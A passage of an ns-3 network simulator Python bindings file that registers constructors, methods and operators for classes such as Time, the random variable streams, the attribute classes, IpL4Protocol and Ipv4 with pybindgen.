    cls.add_method('GetInstanceTypeId',
                   'ns3::TypeId',
                   [],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint32_t ns3::SocketSetDontFragmentTag::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize',
                   'uint32_t',
                   [],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): static ns3::TypeId ns3::SocketSetDontFragmentTag::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## socket.h (module 'network'): bool ns3::SocketSetDontFragmentTag::IsEnabled() const [member function]
    cls.add_method('IsEnabled',
                   'bool',
                   [],
                   is_const=True)
    ## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Print(std::ostream & os) const [member function]
    cls.add_method('Print',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Serialize(ns3::TagBuffer i) const [member function]
    cls.add_method('Serialize',
                   'void',
                   [param('ns3::TagBuffer', 'i')],
                   is_const=True, is_virtual=True)
    return
def register_Ns3Time_methods(root_module, cls):
    """Register operators, constructors and members of ns3::Time (nstime.h, module 'core')."""
    time_type = root_module['ns3::Time']
    # Arithmetic operators: Time +/- Time -> Time.
    for op in ('+', '-'):
        cls.add_binary_numeric_operator(op, time_type, time_type, param('ns3::Time const &', 'right'))
    # Comparison, in-place and stream operators; registration order kept as generated.
    for op in ('<', '>', '!='):
        cls.add_binary_comparison_operator(op)
    for op in ('+=', '-='):
        cls.add_inplace_numeric_operator(op, param('ns3::Time const &', 'right'))
    cls.add_output_stream_operator()
    for op in ('<=', '==', '>='):
        cls.add_binary_comparison_operator(op)
    # Constructors: default, copy, one per numeric type, then string and int64x64_t.
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Time const &', 'o')])
    for numeric_type in ('double', 'int', 'long int', 'long long int',
                         'unsigned int', 'long unsigned int', 'long long unsigned int'):
        cls.add_constructor([param(numeric_type, 'v')])
    cls.add_constructor([param('std::string const &', 's')])
    cls.add_constructor([param('ns3::int64x64_t const &', 'value')])
    # Three-way comparison helper.
    cls.add_method('Compare', 'int', [param('ns3::Time const &', 'o')], is_const=True)
    # Static factory methods.
    cls.add_method('From', 'ns3::Time',
                   [param('ns3::int64x64_t const &', 'from'), param('ns3::Time::Unit', 'timeUnit')],
                   is_static=True)
    cls.add_method('From', 'ns3::Time', [param('ns3::int64x64_t const &', 'value')], is_static=True)
    cls.add_method('FromDouble', 'ns3::Time',
                   [param('double', 'value'), param('ns3::Time::Unit', 'timeUnit')], is_static=True)
    cls.add_method('FromInteger', 'ns3::Time',
                   [param('uint64_t', 'value'), param('ns3::Time::Unit', 'timeUnit')], is_static=True)
    # Value accessors in various units.
    cls.add_method('GetDouble', 'double', [], is_const=True)
    for getter in ('GetFemtoSeconds', 'GetInteger', 'GetMicroSeconds',
                   'GetMilliSeconds', 'GetNanoSeconds', 'GetPicoSeconds'):
        cls.add_method(getter, 'int64_t', [], is_const=True)
    cls.add_method('GetResolution', 'ns3::Time::Unit', [], is_static=True)
    cls.add_method('GetSeconds', 'double', [], is_const=True)
    cls.add_method('GetTimeStep', 'int64_t', [], is_const=True)
    # Sign / zero predicates.
    for predicate in ('IsNegative', 'IsPositive', 'IsStrictlyNegative',
                      'IsStrictlyPositive', 'IsZero'):
        cls.add_method(predicate, 'bool', [], is_const=True)
    # Static extremes, resolution control and one-time initialization.
    cls.add_method('Max', 'ns3::Time', [], is_static=True)
    cls.add_method('Min', 'ns3::Time', [], is_static=True)
    cls.add_method('SetResolution', 'void', [param('ns3::Time::Unit', 'resolution')], is_static=True)
    cls.add_method('StaticInit', 'bool', [], is_static=True)
    # Explicit unit conversions.
    cls.add_method('To', 'ns3::int64x64_t', [param('ns3::Time::Unit', 'timeUnit')], is_const=True)
    cls.add_method('ToDouble', 'double', [param('ns3::Time::Unit', 'timeUnit')], is_const=True)
    cls.add_method('ToInteger', 'int64_t', [param('ns3::Time::Unit', 'timeUnit')], is_const=True)
    return
def register_Ns3TraceSourceAccessor_methods(root_module, cls):
    """Register members of the abstract ns3::TraceSourceAccessor (trace-source-accessor.h, module 'core')."""
    # Copy constructor first, then the default one (order as generated).
    cls.add_constructor([param('ns3::TraceSourceAccessor const &', 'arg0')])
    cls.add_constructor([])
    # Four pure-virtual hooks; the contextful variants take an extra string argument.
    for name, with_context in (('Connect', True), ('ConnectWithoutContext', False),
                               ('Disconnect', True), ('DisconnectWithoutContext', False)):
        arguments = [param('ns3::ObjectBase *', 'obj', transfer_ownership=False)]
        if with_context:
            arguments.append(param('std::string', 'context'))
        arguments.append(param('ns3::CallbackBase const &', 'cb'))
        cls.add_method(name, 'bool', arguments,
                       is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3Trailer_methods(root_module, cls):
    """Register members of the abstract ns3::Trailer base class (trailer.h, module 'network')."""
    cls.add_output_stream_operator()
    cls.add_constructor([])
    cls.add_constructor([param('ns3::Trailer const &', 'arg0')])
    # Deserialize is the only non-const pure-virtual member.
    cls.add_method('Deserialize', 'uint32_t', [param('ns3::Buffer::Iterator', 'end')],
                   is_pure_virtual=True, is_virtual=True)
    cls.add_method('GetSerializedSize', 'uint32_t', [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('Serialize', 'void', [param('ns3::Buffer::Iterator', 'start')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3TriangularRandomVariable_methods(root_module, cls):
    """Register members of ns3::TriangularRandomVariable (random-variable-stream.h, module 'core')."""
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_constructor([])
    # Distribution-parameter accessors.
    for getter in ('GetMean', 'GetMin', 'GetMax'):
        cls.add_method(getter, 'double', [], is_const=True)
    # Draw using explicit parameters.
    cls.add_method('GetValue', 'double',
                   [param('double', 'mean'), param('double', 'min'), param('double', 'max')])
    cls.add_method('GetInteger', 'uint32_t',
                   [param('uint32_t', 'mean'), param('uint32_t', 'min'), param('uint32_t', 'max')])
    # Draw using the configured attributes (RandomVariableStream overrides).
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return
def register_Ns3UniformRandomVariable_methods(root_module, cls):
    """Register members of ns3::UniformRandomVariable (random-variable-stream.h, module 'core')."""
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_constructor([])
    # Range accessors.
    for getter in ('GetMin', 'GetMax'):
        cls.add_method(getter, 'double', [], is_const=True)
    # Draw using explicit bounds.
    cls.add_method('GetValue', 'double', [param('double', 'min'), param('double', 'max')])
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'min'), param('uint32_t', 'max')])
    # Draw using the configured attributes (RandomVariableStream overrides).
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return
def register_Ns3WeibullRandomVariable_methods(root_module, cls):
    """Register members of ns3::WeibullRandomVariable (random-variable-stream.h, module 'core')."""
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_constructor([])
    # Distribution-parameter accessors.
    for getter in ('GetScale', 'GetShape', 'GetBound'):
        cls.add_method(getter, 'double', [], is_const=True)
    # Draw using explicit parameters.
    cls.add_method('GetValue', 'double',
                   [param('double', 'scale'), param('double', 'shape'), param('double', 'bound')])
    cls.add_method('GetInteger', 'uint32_t',
                   [param('uint32_t', 'scale'), param('uint32_t', 'shape'), param('uint32_t', 'bound')])
    # Draw using the configured attributes (RandomVariableStream overrides).
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return
def register_Ns3ZetaRandomVariable_methods(root_module, cls):
    """Register members of ns3::ZetaRandomVariable (random-variable-stream.h, module 'core')."""
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_constructor([])
    # Distribution-parameter accessor.
    cls.add_method('GetAlpha', 'double', [], is_const=True)
    # Draw using an explicit parameter.
    cls.add_method('GetValue', 'double', [param('double', 'alpha')])
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'alpha')])
    # Draw using the configured attributes (RandomVariableStream overrides).
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return
def register_Ns3ZipfRandomVariable_methods(root_module, cls):
    """Register members of ns3::ZipfRandomVariable (random-variable-stream.h, module 'core')."""
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_constructor([])
    # Distribution-parameter accessors.
    cls.add_method('GetN', 'uint32_t', [], is_const=True)
    cls.add_method('GetAlpha', 'double', [], is_const=True)
    # Draw using explicit parameters.
    cls.add_method('GetValue', 'double', [param('uint32_t', 'n'), param('double', 'alpha')])
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'n'), param('uint32_t', 'alpha')])
    # Draw using the configured attributes (RandomVariableStream overrides).
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return
def register_Ns3AttributeAccessor_methods(root_module, cls):
    """Register members of the abstract ns3::AttributeAccessor (attribute.h, module 'core')."""
    cls.add_constructor([param('ns3::AttributeAccessor const &', 'arg0')])
    cls.add_constructor([])
    cls.add_method('Get', 'bool',
                   [param('ns3::ObjectBase const *', 'object'), param('ns3::AttributeValue &', 'attribute')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    # Capability queries.
    for query in ('HasGetter', 'HasSetter'):
        cls.add_method(query, 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('Set', 'bool',
                   [param('ns3::ObjectBase *', 'object', transfer_ownership=False),
                    param('ns3::AttributeValue const &', 'value')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3AttributeChecker_methods(root_module, cls):
    """Register members of the abstract ns3::AttributeChecker (attribute.h, module 'core')."""
    cls.add_constructor([param('ns3::AttributeChecker const &', 'arg0')])
    cls.add_constructor([])
    cls.add_method('Check', 'bool', [param('ns3::AttributeValue const &', 'value')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('Copy', 'bool',
                   [param('ns3::AttributeValue const &', 'source'), param('ns3::AttributeValue &', 'destination')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('Create', 'ns3::Ptr< ns3::AttributeValue >', [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    # CreateValidValue is the only concrete (non-pure) member registered here.
    cls.add_method('CreateValidValue', 'ns3::Ptr< ns3::AttributeValue >',
                   [param('ns3::AttributeValue const &', 'value')], is_const=True)
    # Type-description queries.
    for query in ('GetUnderlyingTypeInformation', 'GetValueTypeName'):
        cls.add_method(query, 'std::string', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    cls.add_method('HasUnderlyingTypeInformation', 'bool', [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3AttributeValue_methods(root_module, cls):
    """Register members of the abstract ns3::AttributeValue (attribute.h, module 'core')."""
    cls.add_constructor([param('ns3::AttributeValue const &', 'arg0')])
    cls.add_constructor([])
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    # DeserializeFromString mutates the value, so it is not const.
    cls.add_method('DeserializeFromString', 'bool',
                   [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_pure_virtual=True, is_virtual=True)
    cls.add_method('SerializeToString', 'std::string',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3CallbackChecker_methods(root_module, cls):
    """Register constructors of ns3::CallbackChecker (callback.h, module 'core')."""
    # Default constructor, then copy constructor (order as generated).
    cls.add_constructor([])
    cls.add_constructor([param('ns3::CallbackChecker const &', 'arg0')])
    return
def register_Ns3CallbackImplBase_methods(root_module, cls):
    """Register members of ns3::CallbackImplBase (callback.h, module 'core')."""
    cls.add_constructor([])
    cls.add_constructor([param('ns3::CallbackImplBase const &', 'arg0')])
    cls.add_method('IsEqual', 'bool',
                   [param('ns3::Ptr< ns3::CallbackImplBase const >', 'other')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3CallbackValue_methods(root_module, cls):
    """Register members of ns3::CallbackValue (callback.h, module 'core')."""
    cls.add_constructor([param('ns3::CallbackValue const &', 'arg0')])
    cls.add_constructor([])
    cls.add_constructor([param('ns3::CallbackBase const &', 'base')])
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True)
    cls.add_method('DeserializeFromString', 'bool',
                   [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_virtual=True)
    cls.add_method('SerializeToString', 'std::string',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_const=True, is_virtual=True)
    # Note: Set takes the CallbackBase by value.
    cls.add_method('Set', 'void', [param('ns3::CallbackBase', 'base')])
    return
def register_Ns3ConstantRandomVariable_methods(root_module, cls):
    """Register members of ns3::ConstantRandomVariable (random-variable-stream.h, module 'core')."""
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_constructor([])
    # Accessor for the configured constant.
    cls.add_method('GetConstant', 'double', [], is_const=True)
    # Draw using an explicit constant.
    cls.add_method('GetValue', 'double', [param('double', 'constant')])
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'constant')])
    # Draw using the configured attributes (RandomVariableStream overrides).
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return
def register_Ns3DeterministicRandomVariable_methods(root_module, cls):
    """Register members of ns3::DeterministicRandomVariable (random-variable-stream.h, module 'core')."""
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_constructor([])
    # Supplies the fixed sequence of values this stream cycles through.
    cls.add_method('SetValueArray', 'void',
                   [param('double *', 'values'), param('uint64_t', 'length')])
    # RandomVariableStream overrides.
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return
def register_Ns3EmpiricalRandomVariable_methods(root_module, cls):
    """Register members of ns3::EmpiricalRandomVariable (random-variable-stream.h, module 'core')."""
    cls.add_constructor([])
    # Adds one (value, cumulative probability) point to the empirical CDF.
    cls.add_method('CDF', 'void', [param('double', 'v'), param('double', 'c')])
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    # Private virtual hooks, exposed so Python subclasses can override them.
    cls.add_method('Interpolate', 'double',
                   [param('double', 'arg0'), param('double', 'arg1'), param('double', 'arg2'),
                    param('double', 'arg3'), param('double', 'arg4')],
                   visibility='private', is_virtual=True)
    cls.add_method('Validate', 'void', [], visibility='private', is_virtual=True)
    return
def register_Ns3EmptyAttributeValue_methods(root_module, cls):
    """Register members of ns3::EmptyAttributeValue (attribute.h, module 'core')."""
    cls.add_constructor([param('ns3::EmptyAttributeValue const &', 'arg0')])
    cls.add_constructor([])
    # All three overrides are private in the C++ class.
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [],
                   is_const=True, visibility='private', is_virtual=True)
    cls.add_method('DeserializeFromString', 'bool',
                   [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   visibility='private', is_virtual=True)
    cls.add_method('SerializeToString', 'std::string',
                   [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
                   is_const=True, visibility='private', is_virtual=True)
    return
def register_Ns3ErlangRandomVariable_methods(root_module, cls):
    """Register members of ns3::ErlangRandomVariable (random-variable-stream.h, module 'core')."""
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    cls.add_constructor([])
    # Distribution-parameter accessors (shape k, rate lambda).
    cls.add_method('GetK', 'uint32_t', [], is_const=True)
    cls.add_method('GetLambda', 'double', [], is_const=True)
    # Draw using explicit parameters.
    cls.add_method('GetValue', 'double', [param('uint32_t', 'k'), param('double', 'lambda')])
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'k'), param('uint32_t', 'lambda')])
    # Draw using the configured attributes (RandomVariableStream overrides).
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return
def register_Ns3EventImpl_methods(root_module, cls):
    """Register Python wrappers for ns3::EventImpl (auto-generated).

    Adds, in declaration order, the constructors and member-function bindings
    from event-impl.h (module 'core') to *cls*.  Notify is the pure-virtual
    hook subclasses implement; it is exposed with protected visibility.

    root_module -- top-level pybindgen module being populated
    cls         -- pybindgen class wrapper for ns3::EventImpl
    """
    ## event-impl.h (module 'core'): ns3::EventImpl::EventImpl(ns3::EventImpl const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::EventImpl const &', 'arg0')])
    ## event-impl.h (module 'core'): ns3::EventImpl::EventImpl() [constructor]
    cls.add_constructor([])
    ## event-impl.h (module 'core'): void ns3::EventImpl::Cancel() [member function]
    cls.add_method('Cancel',
                   'void',
                   [])
    ## event-impl.h (module 'core'): void ns3::EventImpl::Invoke() [member function]
    cls.add_method('Invoke',
                   'void',
                   [])
    ## event-impl.h (module 'core'): bool ns3::EventImpl::IsCancelled() [member function]
    cls.add_method('IsCancelled',
                   'bool',
                   [])
    ## event-impl.h (module 'core'): void ns3::EventImpl::Notify() [member function]
    cls.add_method('Notify',
                   'void',
                   [],
                   is_pure_virtual=True, visibility='protected', is_virtual=True)
    return
def register_Ns3ExponentialRandomVariable_methods(root_module, cls):
    """Register Python wrappers for ns3::ExponentialRandomVariable (auto-generated).

    Adds, in declaration order, the constructor and member-function bindings
    from random-variable-stream.h (module 'core') to *cls*.  The no-argument
    GetValue/GetInteger overloads are registered as virtual overrides of the
    RandomVariableStream base interface.

    root_module -- top-level pybindgen module being populated
    cls         -- pybindgen class wrapper for ns3::ExponentialRandomVariable
    """
    ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ExponentialRandomVariable::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable::ExponentialRandomVariable() [constructor]
    cls.add_constructor([])
    ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetMean() const [member function]
    cls.add_method('GetMean',
                   'double',
                   [],
                   is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetBound() const [member function]
    cls.add_method('GetBound',
                   'double',
                   [],
                   is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue(double mean, double bound) [member function]
    cls.add_method('GetValue',
                   'double',
                   [param('double', 'mean'), param('double', 'bound')])
    ## random-variable-stream.h (module 'core'): uint32_t ns3::ExponentialRandomVariable::GetInteger(uint32_t mean, uint32_t bound) [member function]
    cls.add_method('GetInteger',
                   'uint32_t',
                   [param('uint32_t', 'mean'), param('uint32_t', 'bound')])
    ## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue() [member function]
    cls.add_method('GetValue',
                   'double',
                   [],
                   is_virtual=True)
    ## random-variable-stream.h (module 'core'): uint32_t ns3::ExponentialRandomVariable::GetInteger() [member function]
    cls.add_method('GetInteger',
                   'uint32_t',
                   [],
                   is_virtual=True)
    return
def register_Ns3GammaRandomVariable_methods(root_module, cls):
    """Register Python wrappers for ns3::GammaRandomVariable (auto-generated).

    Adds, in declaration order, the constructor and member-function bindings
    from random-variable-stream.h (module 'core') to *cls*.  The no-argument
    GetValue/GetInteger overloads are registered as virtual overrides of the
    RandomVariableStream base interface.

    root_module -- top-level pybindgen module being populated
    cls         -- pybindgen class wrapper for ns3::GammaRandomVariable
    """
    ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::GammaRandomVariable::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## random-variable-stream.h (module 'core'): ns3::GammaRandomVariable::GammaRandomVariable() [constructor]
    cls.add_constructor([])
    ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetAlpha() const [member function]
    cls.add_method('GetAlpha',
                   'double',
                   [],
                   is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetBeta() const [member function]
    cls.add_method('GetBeta',
                   'double',
                   [],
                   is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue(double alpha, double beta) [member function]
    cls.add_method('GetValue',
                   'double',
                   [param('double', 'alpha'), param('double', 'beta')])
    ## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger(uint32_t alpha, uint32_t beta) [member function]
    cls.add_method('GetInteger',
                   'uint32_t',
                   [param('uint32_t', 'alpha'), param('uint32_t', 'beta')])
    ## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue() [member function]
    cls.add_method('GetValue',
                   'double',
                   [],
                   is_virtual=True)
    ## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger() [member function]
    cls.add_method('GetInteger',
                   'uint32_t',
                   [],
                   is_virtual=True)
    return
def register_Ns3IpL4Protocol_methods(root_module, cls):
    """Register Python wrappers for ns3::IpL4Protocol (auto-generated).

    Adds, in declaration order, the constructors and member-function bindings
    from ip-l4-protocol.h (module 'internet') to *cls*.  Most methods are
    pure-virtual: IpL4Protocol is the abstract base for transport protocols
    (TCP/UDP/ICMP) hooked under IPv4/IPv6.  The long 'ns3::Callback< ... >'
    type strings must match pybindgen's registered type names exactly; do not
    reformat them.

    root_module -- top-level pybindgen module being populated
    cls         -- pybindgen class wrapper for ns3::IpL4Protocol
    """
    ## ip-l4-protocol.h (module 'internet'): ns3::IpL4Protocol::IpL4Protocol() [constructor]
    cls.add_constructor([])
    ## ip-l4-protocol.h (module 'internet'): ns3::IpL4Protocol::IpL4Protocol(ns3::IpL4Protocol const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::IpL4Protocol const &', 'arg0')])
    ## ip-l4-protocol.h (module 'internet'): ns3::Callback<void,ns3::Ptr<ns3::Packet>,ns3::Ipv4Address,ns3::Ipv4Address,unsigned char,ns3::Ptr<ns3::Ipv4Route>,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::IpL4Protocol::GetDownTarget() const [member function]
    cls.add_method('GetDownTarget',
                   'ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::Ipv4Address, ns3::Ipv4Address, unsigned char, ns3::Ptr< ns3::Ipv4Route >, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ip-l4-protocol.h (module 'internet'): ns3::Callback<void,ns3::Ptr<ns3::Packet>,ns3::Ipv6Address,ns3::Ipv6Address,unsigned char,ns3::Ptr<ns3::Ipv6Route>,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::IpL4Protocol::GetDownTarget6() const [member function]
    cls.add_method('GetDownTarget6',
                   'ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::Ipv6Address, ns3::Ipv6Address, unsigned char, ns3::Ptr< ns3::Ipv6Route >, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ip-l4-protocol.h (module 'internet'): int ns3::IpL4Protocol::GetProtocolNumber() const [member function]
    cls.add_method('GetProtocolNumber',
                   'int',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## ip-l4-protocol.h (module 'internet'): static ns3::TypeId ns3::IpL4Protocol::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## ip-l4-protocol.h (module 'internet'): ns3::IpL4Protocol::RxStatus ns3::IpL4Protocol::Receive(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::Ipv4Interface> incomingInterface) [member function]
    cls.add_method('Receive',
                   'ns3::IpL4Protocol::RxStatus',
                   [param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::Ipv4Interface >', 'incomingInterface')],
                   is_pure_virtual=True, is_virtual=True)
    ## ip-l4-protocol.h (module 'internet'): ns3::IpL4Protocol::RxStatus ns3::IpL4Protocol::Receive(ns3::Ptr<ns3::Packet> p, ns3::Ipv6Header const & header, ns3::Ptr<ns3::Ipv6Interface> incomingInterface) [member function]
    cls.add_method('Receive',
                   'ns3::IpL4Protocol::RxStatus',
                   [param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv6Header const &', 'header'), param('ns3::Ptr< ns3::Ipv6Interface >', 'incomingInterface')],
                   is_pure_virtual=True, is_virtual=True)
    ## ip-l4-protocol.h (module 'internet'): void ns3::IpL4Protocol::ReceiveIcmp(ns3::Ipv4Address icmpSource, uint8_t icmpTtl, uint8_t icmpType, uint8_t icmpCode, uint32_t icmpInfo, ns3::Ipv4Address payloadSource, ns3::Ipv4Address payloadDestination, uint8_t const * payload) [member function]
    cls.add_method('ReceiveIcmp',
                   'void',
                   [param('ns3::Ipv4Address', 'icmpSource'), param('uint8_t', 'icmpTtl'), param('uint8_t', 'icmpType'), param('uint8_t', 'icmpCode'), param('uint32_t', 'icmpInfo'), param('ns3::Ipv4Address', 'payloadSource'), param('ns3::Ipv4Address', 'payloadDestination'), param('uint8_t const *', 'payload')],
                   is_virtual=True)
    ## ip-l4-protocol.h (module 'internet'): void ns3::IpL4Protocol::ReceiveIcmp(ns3::Ipv6Address icmpSource, uint8_t icmpTtl, uint8_t icmpType, uint8_t icmpCode, uint32_t icmpInfo, ns3::Ipv6Address payloadSource, ns3::Ipv6Address payloadDestination, uint8_t const * payload) [member function]
    cls.add_method('ReceiveIcmp',
                   'void',
                   [param('ns3::Ipv6Address', 'icmpSource'), param('uint8_t', 'icmpTtl'), param('uint8_t', 'icmpType'), param('uint8_t', 'icmpCode'), param('uint32_t', 'icmpInfo'), param('ns3::Ipv6Address', 'payloadSource'), param('ns3::Ipv6Address', 'payloadDestination'), param('uint8_t const *', 'payload')],
                   is_virtual=True)
    ## ip-l4-protocol.h (module 'internet'): void ns3::IpL4Protocol::SetDownTarget(ns3::Callback<void,ns3::Ptr<ns3::Packet>,ns3::Ipv4Address,ns3::Ipv4Address,unsigned char,ns3::Ptr<ns3::Ipv4Route>,ns3::empty,ns3::empty,ns3::empty,ns3::empty> cb) [member function]
    cls.add_method('SetDownTarget',
                   'void',
                   [param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::Ipv4Address, ns3::Ipv4Address, unsigned char, ns3::Ptr< ns3::Ipv4Route >, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
                   is_pure_virtual=True, is_virtual=True)
    ## ip-l4-protocol.h (module 'internet'): void ns3::IpL4Protocol::SetDownTarget6(ns3::Callback<void,ns3::Ptr<ns3::Packet>,ns3::Ipv6Address,ns3::Ipv6Address,unsigned char,ns3::Ptr<ns3::Ipv6Route>,ns3::empty,ns3::empty,ns3::empty,ns3::empty> cb) [member function]
    cls.add_method('SetDownTarget6',
                   'void',
                   [param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::Ipv6Address, ns3::Ipv6Address, unsigned char, ns3::Ptr< ns3::Ipv6Route >, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
                   is_pure_virtual=True, is_virtual=True)
    return
def register_Ns3Ipv4_methods(root_module, cls):
    """Register Python wrappers for ns3::Ipv4 (auto-generated).

    Adds, in declaration order, the constructors, member-function bindings and
    the IF_ANY static attribute from ipv4.h (module 'internet') to *cls*.
    Ipv4 is the abstract IPv4 stack interface, so nearly every method is
    pure-virtual; the Get/Set IpForward and WeakEsModel hooks are private
    virtuals accessed through attributes.

    root_module -- top-level pybindgen module being populated
    cls         -- pybindgen class wrapper for ns3::Ipv4
    """
    ## ipv4.h (module 'internet'): ns3::Ipv4::Ipv4(ns3::Ipv4 const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv4 const &', 'arg0')])
    ## ipv4.h (module 'internet'): ns3::Ipv4::Ipv4() [constructor]
    cls.add_constructor([])
    ## ipv4.h (module 'internet'): bool ns3::Ipv4::AddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function]
    cls.add_method('AddAddress',
                   'bool',
                   [param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
                   is_pure_virtual=True, is_virtual=True)
    ## ipv4.h (module 'internet'): uint32_t ns3::Ipv4::AddInterface(ns3::Ptr<ns3::NetDevice> device) [member function]
    cls.add_method('AddInterface',
                   'uint32_t',
                   [param('ns3::Ptr< ns3::NetDevice >', 'device')],
                   is_pure_virtual=True, is_virtual=True)
    ## ipv4.h (module 'internet'): ns3::Ptr<ns3::Socket> ns3::Ipv4::CreateRawSocket() [member function]
    cls.add_method('CreateRawSocket',
                   'ns3::Ptr< ns3::Socket >',
                   [],
                   is_pure_virtual=True, is_virtual=True)
